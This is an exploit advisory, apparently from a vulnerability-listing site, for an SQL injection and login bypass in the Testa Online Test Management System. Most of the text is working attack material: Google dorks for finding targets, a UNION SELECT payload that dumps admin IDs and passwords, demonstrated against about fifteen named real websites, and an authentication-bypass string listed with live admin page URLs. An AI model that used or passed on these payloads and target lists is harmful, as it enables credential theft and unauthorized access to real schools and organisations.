Testa Online Test Management SQL Injection

2013-11-18 / 2013-11-27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

################################################################ # Exploit Title : Testa Online Test Management Sql Injection / Login page Bypass # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://testa.cc/ # # Software Link Download : http://download.aftab.cc/products/testa/Testa_wos_2.0.0.2.zip # # Google Dork : intitle:Testa Online Test Management System # # Google Dork 2 : inurl:"?test_id=" # # Date: 2013/11/13 # # Tested on: Windows 7 , Linux ############################################################ # Exploit : Sql Injection # # Location : [Target]/?test_id=[Sql Injection] # ###################### # Demo Sql Injection # # http://onlinetest.iauda.ac.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://dr-taghizadeh.ir/test/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://learning.kashanu.ac.ir/azmoon/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://edunabi.ir/testa//?test_id=-1%27+/*!50000union*/+/*!50000select*/+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://behshahr-health.ir/azmoon//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://www.azmoon.biobase.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://www.herfehofankhoy.ir/azmoon/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # # http://az1.orq.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # #http://aliheydarian.ir/test/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # #http://azmoonarabi.gigfa.com//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://azmoonarabi.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://h-karimi.ir/testa//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://lightchat.ir//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # http://chahischool.vvs.ir/Tests/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ # # ######################################### # Demo Login page Bypass ######################################### username & password : '=' 'or' ######################################### # http://dr-taghizadeh.ir/test/admin/index.php # # http://online.tech-jey.ir/admin/index.php # # http://onlinetest.iauda.ac.ir/admin/index.php # # http://learning.kashanu.ac.ir/azmoon/admin/index.php # # http://edunabi.ir/testa/admin/index.php # # http://behshahr-health.ir/azmoon/admin/index.php # # http://www.azmoon.biobase.ir/admin/ # #http://www.herfehofankhoy.ir/azmoon/admin/ # # http://az1.orq.ir/admin # ################################## ################################## Milad Hacking We Love Mohammad ############################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top